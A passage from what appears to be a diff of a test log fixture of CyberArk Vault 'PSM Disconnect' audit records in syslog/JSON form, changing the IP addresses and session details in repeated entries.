8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<5>1 2021-03-15T10:33:30Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 03:33:30\n 2021-03-15T10:33:30Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 302\n PSM Disconnect\n Info\n Administrator\n PSM Disconnect\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 34.71.250.247\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:01:35;SessionID=29f340df-89e9-405a-beae-0216390cda42;SrcHost=81.32.170.205;User=testark;\n PSM Disconnect\n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 03:33:30","IsoTimestamp":"2021-03-15T10:33:30Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"302","Desc":"PSM Disconnect","Severity":"Info","Issuer":"Administrator","Action":"PSM Disconnect","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:01:35;SessionID=29f340df-89e9-405a-beae-0216390cda42;SrcHost=81.32.170.205;User=testark;","Message":"PSM Disconnect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CPMStatus","Value":"success"},{"Name":"RetriesCount","Value":"-1"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<5>1 2021-03-15T10:34:50Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 03:34:50\n 2021-03-15T10:34:50Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 302\n PSM Disconnect\n Info\n Administrator\n PSM Disconnect\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 34.71.250.247\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:01:13;SessionID=f1654cf8-8ce5-472a-8205-ba731b0fab46;SrcHost=81.32.170.205;User=testark;\n PSM Disconnect\n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 03:34:50","IsoTimestamp":"2021-03-15T10:34:50Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"302","Desc":"PSM Disconnect","Severity":"Info","Issuer":"Administrator","Action":"PSM Disconnect","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:01:13;SessionID=f1654cf8-8ce5-472a-8205-ba731b0fab46;SrcHost=81.32.170.205;User=testark;","Message":"PSM Disconnect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CPMStatus","Value":"success"},{"Name":"RetriesCount","Value":"-1"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<5>1 2021-03-15T11:12:09Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 04:12:09\n 2021-03-15T11:12:09Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 302\n PSM Disconnect\n Info\n Administrator\n PSM Disconnect\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 34.71.250.247\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:37:10;SessionID=8b3d0b38-aef5-49d9-bdd7-d57706887d8b;SrcHost=81.32.170.205;User=testark;\n PSM Disconnect\n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 04:12:09","IsoTimestamp":"2021-03-15T11:12:09Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"302","Desc":"PSM Disconnect","Severity":"Info","Issuer":"Administrator","Action":"PSM Disconnect","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:37:10;SessionID=8b3d0b38-aef5-49d9-bdd7-d57706887d8b;SrcHost=81.32.170.205;User=testark;","Message":"PSM Disconnect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CPMStatus","Value":"success"},{"Name":"RetriesCount","Value":"-1"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<5>1 2021-03-15T13:18:36Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 06:18:36\n 2021-03-15T13:18:36Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 302\n PSM Disconnect\n Info\n Administrator\n PSM Disconnect\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 34.71.250.247\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:05;SessionID=692fe25f-f940-4170-8ea4-5241b35173f0;SrcHost=81.32.170.205;User=adrian;\n PSM Disconnect\n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 06:18:36","IsoTimestamp":"2021-03-15T13:18:36Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"302","Desc":"PSM Disconnect","Severity":"Info","Issuer":"Administrator","Action":"PSM Disconnect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:05;SessionID=692fe25f-f940-4170-8ea4-5241b35173f0;SrcHost=81.32.170.205;User=adrian;","Message":"PSM Disconnect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<5>1 2021-03-15T14:08:11Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 07:08:11\n 2021-03-15T14:08:11Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 302\n PSM Disconnect\n Info\n Administrator\n PSM Disconnect\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 34.71.250.247\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:06;SessionID=f5725611-ca57-4a2a-a089-f45b3174a358;SrcHost=81.32.170.205;User=adrian;\n PSM Disconnect\n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 07:08:11","IsoTimestamp":"2021-03-15T14:08:11Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"302","Desc":"PSM Disconnect","Severity":"Info","Issuer":"Administrator","Action":"PSM Disconnect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:06;SessionID=f5725611-ca57-4a2a-a089-f45b3174a358;SrcHost=81.32.170.205;User=adrian;","Message":"PSM Disconnect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<5>1 2021-03-15T14:08:36Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 07:08:36\n 2021-03-15T14:08:36Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 302\n PSM Disconnect\n Info\n Administrator\n PSM Disconnect\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 34.71.250.247\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:09;SessionID=7db90436-8a1a-4203-9a96-65137625ab2d;SrcHost=81.32.170.205;User=testark;\n PSM Disconnect\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 07:08:36","IsoTimestamp":"2021-03-15T14:08:36Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"302","Desc":"PSM Disconnect","Severity":"Info","Issuer":"Administrator","Action":"PSM Disconnect","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:09;SessionID=7db90436-8a1a-4203-9a96-65137625ab2d;SrcHost=81.32.170.205;User=testark;","Message":"PSM Disconnect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615814025"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"},{"Name":"UseSudoOnReconcile","Value":"Yes"}]}}}} -<5>1 2021-03-15T15:00:21Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 08:00:21\n 2021-03-15T15:00:21Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 302\n PSM Disconnect\n Info\n Administrator\n PSM Disconnect\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 34.71.250.247\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:49:12;SessionID=27f74dce-f5d5-4c94-bf99-ca6aafe2c518;SrcHost=81.32.170.205;User=testark;\n PSM Disconnect\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 08:00:21","IsoTimestamp":"2021-03-15T15:00:21Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"302","Desc":"PSM Disconnect","Severity":"Info","Issuer":"Administrator","Action":"PSM Disconnect","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:49:12;SessionID=27f74dce-f5d5-4c94-bf99-ca6aafe2c518;SrcHost=81.32.170.205;User=testark;","Message":"PSM Disconnect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"1"},{"Name":"LastFailDate","Value":"1615819476"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"},{"Name":"UseSudoOnReconcile","Value":"Yes"}]}}}} +<5>1 2021-03-11T17:38:26Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:38:26\n 2021-03-11T17:38:26Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 302\n PSM Disconnect\n Info\n Administrator\n PSM Disconnect\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian\n 67.43.156.13\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:13;SessionID=87012dcc-8290-11eb-949e-080027efd402;SrcHost=127.0.0.1;User=adrian;\n PSM Disconnect\n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:38:26","IsoTimestamp":"2021-03-11T17:38:26Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"302","Desc":"PSM Disconnect","Severity":"Info","Issuer":"Administrator","Action":"PSM Disconnect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:13;SessionID=87012dcc-8290-11eb-949e-080027efd402;SrcHost=127.0.0.1;User=adrian;","Message":"PSM Disconnect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-11T17:47:01Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:47:01\n 2021-03-11T17:47:01Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 302\n PSM Disconnect\n Info\n Administrator\n PSM Disconnect\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian\n 67.43.156.13\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:11;SessionID=ba22b012-8291-11eb-b981-080027efd402;SrcHost=127.0.0.1;User=adrian;\n PSM Disconnect\n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:47:01","IsoTimestamp":"2021-03-11T17:47:01Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"302","Desc":"PSM Disconnect","Severity":"Info","Issuer":"Administrator","Action":"PSM Disconnect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:11;SessionID=ba22b012-8291-11eb-b981-080027efd402;SrcHost=127.0.0.1;User=adrian;","Message":"PSM Disconnect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-11T17:48:40Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:48:40\n 2021-03-11T17:48:40Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 302\n PSM Disconnect\n Info\n Administrator\n PSM Disconnect\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian\n 67.43.156.13\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:12;SessionID=f6acbf00-8291-11eb-b9ba-080027efd402;SrcHost=10.0.2.2;User=adrian;\n PSM Disconnect\n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:48:40","IsoTimestamp":"2021-03-11T17:48:40Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"302","Desc":"PSM Disconnect","Severity":"Info","Issuer":"Administrator","Action":"PSM Disconnect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:12;SessionID=f6acbf00-8291-11eb-b9ba-080027efd402;SrcHost=10.0.2.2;User=adrian;","Message":"PSM Disconnect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-11T17:55:02Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:55:02\n 2021-03-11T17:55:02Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 302\n PSM Disconnect\n Info\n Administrator\n PSM Disconnect\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian\n 67.43.156.13\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:12;SessionID=d8ff4d32-8292-11eb-b962-080027efd402;SrcHost=10.0.2.2;User=adrian;\n PSM Disconnect\n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:55:02","IsoTimestamp":"2021-03-11T17:55:02Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"302","Desc":"PSM Disconnect","Severity":"Info","Issuer":"Administrator","Action":"PSM Disconnect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:12;SessionID=d8ff4d32-8292-11eb-b962-080027efd402;SrcHost=10.0.2.2;User=adrian;","Message":"PSM Disconnect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-11T17:56:42Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:56:42\n 2021-03-11T17:56:42Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 302\n PSM Disconnect\n Info\n Administrator\n PSM Disconnect\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian\n 67.43.156.13\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:12;SessionID=173dd46a-8293-11eb-afcb-080027efd402;SrcHost=10.0.2.2;User=adrian;\n PSM Disconnect\n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:56:42","IsoTimestamp":"2021-03-11T17:56:42Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"302","Desc":"PSM Disconnect","Severity":"Info","Issuer":"Administrator","Action":"PSM Disconnect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:12;SessionID=173dd46a-8293-11eb-afcb-080027efd402;SrcHost=10.0.2.2;User=adrian;","Message":"PSM Disconnect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-11T20:23:30Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 12:23:30\n 2021-03-11T20:23:30Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 302\n PSM Disconnect\n Info\n Administrator\n PSM Disconnect\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian\n 67.43.156.13\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:12;SessionID=988b22e8-82a7-11eb-83b9-080027efd402;SrcHost=10.0.2.2;User=adrian;\n PSM Disconnect\n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 12:23:30","IsoTimestamp":"2021-03-11T20:23:30Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"302","Desc":"PSM Disconnect","Severity":"Info","Issuer":"Administrator","Action":"PSM Disconnect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:12;SessionID=988b22e8-82a7-11eb-83b9-080027efd402;SrcHost=10.0.2.2;User=adrian;","Message":"PSM Disconnect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-14T13:49:54Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 06:49:54\n 2021-03-14T13:49:54Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 302\n PSM Disconnect\n Info\n Administrator\n PSM Disconnect\n \n \n partner\n Root\\Operating System-UnixSSH-67.43.156.15-testark\n 67.43.156.15\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:18;SessionID=d284c268-2ba0-4366-af52-e33459b073a1;SrcHost=67.43.156.13;User=testark;\n PSM Disconnect\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 06:49:54","IsoTimestamp":"2021-03-14T13:49:54Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"302","Desc":"PSM Disconnect","Severity":"Info","Issuer":"Administrator","Action":"PSM Disconnect","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-67.43.156.15-testark","Station":"67.43.156.15","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:18;SessionID=d284c268-2ba0-4366-af52-e33459b073a1;SrcHost=67.43.156.13;User=testark;","Message":"PSM Disconnect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615729572"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-14T13:51:35Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 06:51:35\n 2021-03-14T13:51:35Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 302\n PSM Disconnect\n Info\n Administrator\n PSM Disconnect\n \n \n partner\n Root\\Operating System-UnixSSH-67.43.156.15-testark\n 67.43.156.15\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:54;SessionID=47747796-03e1-4a11-af39-ab56c00e7732;SrcHost=67.43.156.13;User=testark;\n PSM Disconnect\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 06:51:35","IsoTimestamp":"2021-03-14T13:51:35Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"302","Desc":"PSM Disconnect","Severity":"Info","Issuer":"Administrator","Action":"PSM Disconnect","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-67.43.156.15-testark","Station":"67.43.156.15","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:54;SessionID=47747796-03e1-4a11-af39-ab56c00e7732;SrcHost=67.43.156.13;User=testark;","Message":"PSM Disconnect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615729572"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-15T10:33:30Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 03:33:30\n 2021-03-15T10:33:30Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 302\n PSM Disconnect\n Info\n Administrator\n PSM Disconnect\n \n \n partner\n Root\\Operating System-UnixSSH-67.43.156.15-testark\n 